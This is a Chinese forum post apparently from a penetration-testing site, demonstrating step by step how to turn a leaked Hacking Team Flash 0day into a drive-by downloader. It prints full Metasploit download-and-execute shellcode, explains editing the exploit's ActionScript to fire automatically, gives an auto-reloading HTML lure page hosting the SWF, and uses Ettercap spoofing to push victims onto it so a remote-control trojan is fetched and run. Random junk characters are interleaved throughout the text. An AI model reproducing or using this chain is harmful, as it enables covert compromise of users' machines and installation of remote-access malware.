中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

; m4 j- s7 u H& b; x 三、flash 0day之手工代码修改制作下载者实例入侵演示 9 k8 `+ t' F: D' O. n5 F

% S) }- R+ n g7 p4 X, E% [

: i* o: f+ `& d" w 利用到的工具: + M2 k" f4 M; \9 U: g- ]

% U) U4 j1 \& a( V- f5 P4 w/ b$ |! Y! w4 l

\% j+ f# s! g6 q; `0 n' m# N Msf 3 M. }2 g3 l" J6 {: c d+ h

- H p. V1 H) K0 B1 }8 c1 l V5 G

" o' I$ Y8 e" j Ettercap . P4 V; I" ]# l- e( N6 ~

- S: Z/ d2 w" H2 U

0 M% k. K6 d, `5 Y4 f$ x2 H2 _ Adobe Flash CS6 - D+ ]4 s( |. Z/ d# S y

8 N8 K% f8 f) R+ Z& V# p( r

% s4 s& Z9 C, R2 o9 W/ b8 V( V3 v$ | Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ) P6 H9 `. z! T3 s( Q5 K

/ ?. n( R. |' S

5 m( d3 E& m" h% y5 o" ]' k0 ? 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options , `3 G3 y7 r. n# B6 l+ ~5 G# O; G

) p: R, m+ J+ j6 ]9 q/ O& N

& z: ~9 z; @3 f0 T$ f1 e: j 如图: 6 y( U! X f3 `+ y5 \: Y3 [# D

1 q& y: }' U% M/ `1 ?9 Z1 G& B

0 d6 @+ L' g: M: S% z5 o: Y   ) d: ^" O0 ~: a1 J5 N3 [5 B

0 \6 F. g+ E: }# z1 R

4 G& d; i2 D9 O( ?. q; C* P$ E   ; x7 C) ~8 P: A& `- Q* z$ I+ h

" l' [/ `$ _8 G0 X9 i9 Y. R% W

- ]7 T: U) J9 b7 i 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / |; @/ D v4 a( n# U

* r& b6 O+ V( a4 _7 `" Q

* T1 H' S. e4 p$ h4 V   - l0 i: s8 y& k7 ~- K- w6 a: r

! X& J3 D4 B; h+ d/ w/ o0 s

: G9 G; W/ @# d4 i   ' m9 @8 X3 K1 e. d) [+ z

6 H5 n( O" @2 l- ?4 t% m

3 F8 O" N3 ?* K$ ?% O$ n: { 然后执行generate -t dword生成shellcode,如下: , T* \, G( V3 X

! l/ k& T+ b" @' L0 u

( e- q! D0 y6 V5 k/ P   0 p( W" O: l4 b

* E1 m% ?9 G8 i( ^- H- e, ?

# X+ p& j. T6 [ ~0 U+ u7 S7 N4 X' M 复制代码到文本下便于我们一会编辑flash exp,如下: . _, n2 n5 v$ o- e9 f6 B

9 y; S8 D: Q0 }' I. ~6 }

2 f% Y! K* d5 ]- x- { 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, # B2 v+ O1 @$ @; U& Z

@ q' m# S1 L4 d& L; g

5 Y0 h; F6 Q1 \+ O/ p$ |2 y 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 2 S/ `, T" o! K7 b, ~

; Y, h0 @( e/ F$ q; O* n$ M1 l

) H$ b/ h8 i& T- ^- g# o 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 6 B3 y/ t) d- ]( G' K

/ K! ~; g) a8 C

" A. s7 Q5 c* \, l 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 d, {% F e' ^. D7 x

! S& H7 o2 ^7 A) D6 q! s& l1 O

' R0 p8 |& v/ Q 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / Q2 m$ J- `6 p" {8 G( d- C @/ e

3 w# S! W4 l# m% E

. q* d: r- k/ w& n 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / x( Z4 g( p/ H) i% Y3 v& M. z5 p" f

* C' d3 m7 T3 C. u; C( ~1 }- h

9 O1 X3 H/ ?9 g& I$ p' P 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 8 l: ^# U4 f7 [/ B9 F6 p1 P0 Q( c! l

* O& c* V: E* ?7 f- j3 p

" B7 ^ i6 u. c9 G! _: V 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 8 h, u3 s. ^- p# {0 c

4 G/ p( Y$ U2 _9 {. y/ I

1 n3 w7 ~, W+ z. e2 l 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, W6 {+ h9 S& @7 w6 M$ ~2 E! t

6 q$ Y9 @3 B# B: u

2 {% g8 z; z8 Z6 o0 P$ x2 U- v 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ; u; ~: @$ c8 T& S+ M! I4 a

+ l4 ?5 K$ \( m5 D& D

1 N# [4 z, d9 i ^ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ' }/ T% r# d, f r

; U0 s# |, ~ D! ?6 O

/ X4 Z4 R! F! a 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 3 D* G, P' c, j

9 z a' G4 h+ u$ V% D

; S; I6 C* e8 {0 l! P" V' J7 T: ?5 z0 @ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ' V, u$ `0 g, S! [: q+ v

8 v3 u0 E( J& H- |

! r0 o. a$ `6 ] 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 " X+ J& u# I# M" r8 {$ v$ t" q

b6 t* w; |' c" g7 ], K1 D

. V9 ?/ Y3 ?7 L6 v/ q   - v' O3 I& N3 i( @; m

; h2 K a8 r% W1 p, H

8 X* v# t! c& R1 U: ^" e" f   : A2 ~" x: o+ O6 w9 [( W

+ ?8 Y; N9 s, `7 }: g+ L5 ~& x

/ [' W- m4 d8 ^$ C 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 5 ~! T1 S0 g$ F0 E; }( Q

% f. Y. q& ^: Z" o: U5 F

+ t( r H/ l, |. y   3 ~: ]- o! K- A% t% n6 Y

# {% y& f" U' }3 t/ L& r

7 w; i* t7 e. J. d2 Q 先修改ShellWin32.as,部分源代码如图: & _7 Q4 @+ v5 K' a

8 s7 B" ^% i+ r; H1 k( L4 E9 I

6 F3 M+ t! w0 h* ^5 Z   3 O! Y* A' V6 O2 d4 T: o

, q# A( O2 B" Y) y) Z2 C% y( j2 J

B, M, Z" v( k" L. B 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 7 m1 f% l, E3 f* R

7 y. U' i) ]& k4 q5 D( ~) h6 P; @7 [

4 R0 \* {! t5 T' M0 Y h: X, b   , v( K% Z3 p" ?' [* S

6 W i! Q8 r( i$ B1 H1 p- D2 s: B

+ v3 x! z+ M/ B% t! v1 q# N7 n 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: # f5 S$ t5 }$ l$ q; Q# a L

& S% [4 l: I' U9 R1 I# ?

) M2 v0 O% T+ p! v* a# ]   " T) V, b* A4 u& P

7 M6 m4 l$ t) r( A( `

; h! b8 m4 m4 Z" D2 \8 ]( l+ j 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 4 C; O" q- O1 {

4 I) ^7 c6 p$ r( Z

( M' u6 h0 _9 X   : @( k. c0 q- o5 A3 b

6 q: e7 S( ]0 O

6 m4 a& y; t% J: I, w   : t4 A, D( T" n" w) p& L9 r( t

( r A6 j% x1 A* y8 Y

6 i. `% U9 l7 J2 L5 ^0 z8 Z   # ?7 @% _6 W" }

# v/ L; x& s5 }# H' G

* J+ y. y, q; E: A8 i 然后点保存,下面我们来编译一下,打开 # p6 _" a* H. X9 _+ _* e, C+ c

1 {+ C( R7 P/ a

) v9 u: C4 V+ I3 w) } exp1.fla然后点文件-发布,看看编译没错误 ' b% w" Z1 Y: u( x

2 i& D1 e) Z% [) X0 J2 w

: q4 U3 S) o7 i. f$ E   8 |$ n- e; a Y6 F1 A. K: u4 Q

! {# V1 D6 y/ n4 w2 q7 {

1 z. w4 ?5 Q- s8 v8 n   # O1 U: C3 f- ]& i3 b- Q

6 s/ b9 }% ~: q; S

1 f, Z5 L- i9 P8 ?9 }   / g5 `7 s9 }$ _0 n( p' p+ B

5 `! |) Z# Q6 H- ]

( q8 c+ t a7 m   * l5 B8 l$ n6 t0 u7 h8 L: W

& E$ v9 Y/ Y3 \, e% ?3 G5 P

* ]2 f' m2 a2 q7 ^) a" e 然后我们把生成的 ( ^+ K6 h# c1 H- Y

5 ^, W4 ^/ z6 k2 ~+ O

' b9 H, J* ?+ |6 G1 `' i4 S1 z exp1.swf丢到kailinux /var/www/html下: ; m( N+ Q7 I- T9 p ~& h; B

2 I3 M/ P: _: H; ?9 `' q

$ S4 @+ G3 K. O @1 l' q 然后把这段代码好好编辑一下 ( p" F, q- Y7 i+ H+ t7 p* d

: Y# o5 K% V/ V# ^+ }4 N% i$ Y

- ^0 H( n+ Q4 z$ S( K! F   5 {* X2 L: L& s3 u/ L9 C

' k: R1 L" p- F' |1 ~: M# ^4 k

- e% W" |% d7 r4 I   4 @$ q- e( a; q; i* K+ K8 k& q

- d9 `$ e6 y4 t" O, Z6 C. P8 {

+ H- S4 ]) i9 N/ T) h0 G$ p+ E, R( `   * z+ T, W" p- q4 R/ j! d

' c( }* U" | Y. m" g* \7 Z

2 B5 I2 [4 N& ~# x9 j   : |, c6 }1 f) H$ b2 _: I1 v

" o; i# I2 u7 U: y g% y. e- G

' w' z) @ H" b6 M   8 E) C$ K. z! n3 Q# L4 \

! N5 ^2 J* M, |- a+ m

/ k; q" G9 V% ]3 f b6 e; H6 g5 A   * s: T# V% [6 z4 _6 ?

7 e% s7 _/ b6 X5 }. ^7 }

; U# r5 A Q6 D$ ~ <!DOCTYPE html> ! n- f& G- P# m- F% B/ T8 W2 u

$ ?$ Z" Z! i0 A7 n5 D4 j; T

0 V2 V8 r5 Z/ W# J* d <html> ( x% w. V. t0 m. L3 g- c9 r* \6 }

& t- |( }1 T( Z8 }

( P7 L2 [5 p( y& ~- B$ E <head> 5 I0 K$ C h; ?7 G/ y, m

9 @( ^4 o d; Z8 W1 K4 |5 @! q

% r) T9 F& H9 e# v3 a0 k <meta http-equiv="Content-Type" content="text/html; & O1 p+ J" z# C

8 O( z2 M2 q9 K

4 ]* d! ^) ?7 g& ` charset=utf-8"/> 6 ?- ?. w m% `: J1 U

z& ~8 v5 U5 a) Y( ? G/ ]" N

7 S/ v* _& U& j u* h* L </head> : H) U- S, g( `; W: W

: s9 x$ o, k4 v- D/ f

& M1 e$ `( H/ j$ s7 o' i <body> : x# ~* D1 l' t5 f G6 X

+ ^9 ^. z2 M7 J4 H1 B, }

( k# D2 B5 Y# o, w/ ], h# y4 @6 F! ^ <h2> Please wait, the requested page is loading...</h2> . v( U! R% Z1 s8 Y+ \- Y0 h) y# |

& v( ^# a% [+ A" ?; P( ^9 i

% |0 k; |. |% @" G3 y' P) u* v <br> ) r1 b! M7 K( [: z

# ]( S7 Z6 t, \

/ c# n! c, W# c* ^" j <OBJECT 2 k" V1 k1 j# f/ I, s5 G

: Y# F' t; \# l' l2 R: k* d

" R" }/ h. t; b# p! x classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 2 j' l4 H) W$ w) P* e! _/ n

( I2 \$ V0 \ |& v6 y

* ?7 |3 `2 Z6 a" k5 S VALUE="http://192.168.0.109/exp1.swf"></OBJECT> , a: h6 W3 a) I( z

. Y' P, _/ M7 i+ E& l! [0 L

3 j2 }4 u/ Y- Q$ [3 P </body> 3 E1 d. P% D# ]; B. @

5 L( s: z/ ]) N& R; e7 l

8 }* n! X% _+ x& \. W' u: l, q <script> + D$ ]$ _. K. \, _

1 T$ |3 V3 L+ R9 r- v1 m7 [

, s; J4 X& {. a! M     setTimeout(function () { ( u" s6 t! V; W* S1 d

& r; ~ {- K4 P

/ m# B1 Z- R8 ~6 T' Z          " {0 h8 x3 F8 g/ v& c! V2 B

* j/ D6 ^9 X1 C: y' G; Q( o

0 _9 D2 M) h* G7 c window.location.reload(); 9 T6 a1 Y6 L1 c. ?$ b! R

% g& l0 z4 p/ |! c% Z {

, o# S- L/ A( _* g# y( x     }, 10000); ( l/ ~! e: ?5 a0 U6 Q) ?8 T

) _3 O( z) n9 e" i

3 ?/ C5 z5 Y; M+ {8 K   $ g$ _* R, f0 O. U

. R- v: h$ |% O5 W! e

5 p$ v( r6 B7 G! |& {- ] </script> 4 H- E7 E8 u- A' d a n% s

# P; K! O9 T- D5 x" Z% W, g

2 g! v1 m$ u/ p+ | </html> ! x' {- y4 Z$ V8 e, T) C

$ j9 K; Y* I* {% d0 }9 ]

% P4 K$ T2 Y1 \: c _6 c   6 a; K' ~7 w: B R

5 f/ z8 L8 O, F! `

1 @8 O \& n M) u8 [1 S 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: * E, r- y$ |1 Q5 G' A8 e5 H5 B

- V! o+ K- E4 W- B9 \' _2 B

, ^- Q/ b% U @$ d$ A8 q0 p   + A( f. f% T0 s

+ z8 C `" k. o

2 \% \' a2 g1 h$ F3 R% v0 T   ! o6 S7 K" ]) C7 O. ?3 N

4 |7 T0 G6 H- @1 ?

2 T5 l% w$ s6 X* i7 l   : {: w6 y% l" `, i* j

* i; T' S+ X6 ?* x3 b m

" n4 V* @, R: I1 m6 P   # v# S3 y$ B- q" K& ]

. E& `$ q) |6 t( C( j

3 h8 R# C# E/ e/ }, G   : A' W/ N1 ]/ Q

1 n7 K7 J6 z8 R& O

r' q" f" [# n. D& |8 i2 i 下面我们用ettercap欺骗如图: 0 ~& R3 f, D8 v( R

- i; n. q& G+ @4 j( q! \6 F

2 _% O' Z& r9 W* y4 t5 K7 P   0 D' l+ }2 M; c, S) c6 ]" R

8 K- N* Y; K* X! d2 G# [

6 _# x% {: z7 h" |- u: T% P   & x* T$ o2 I! J7 \) }7 q

4 G w4 L* W/ E: f, g E

" b! O+ n3 G, _' `- A) D& B 下面我们随便访问个网站看看: - y) L: K. M$ W% J- K8 L9 Q

8 E) G% o% P/ i" V2 M

: P, d) W( [! }, \$ a& q 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # u/ @8 f; D7 x7 H/ t& I0 w/ u4 ]1 a

) o2 |' u1 m$ E0 r. A# A: w; U

4 s+ @# ]$ m* j/ u   2 `3 m# r% P8 A* U: q) N7 q. K

# v8 D: U1 c/ I. B" L

6 @- W' b0 Z) M* t: Z0 ? 我们看另一台, ( a8 ]7 P4 Z& Q9 @( u4 O; H

9 M. S4 c0 _- d4 E- u

- ]. H1 M# a. r( e 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 * s4 b# l p& c3 E- m9 ~/ y





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2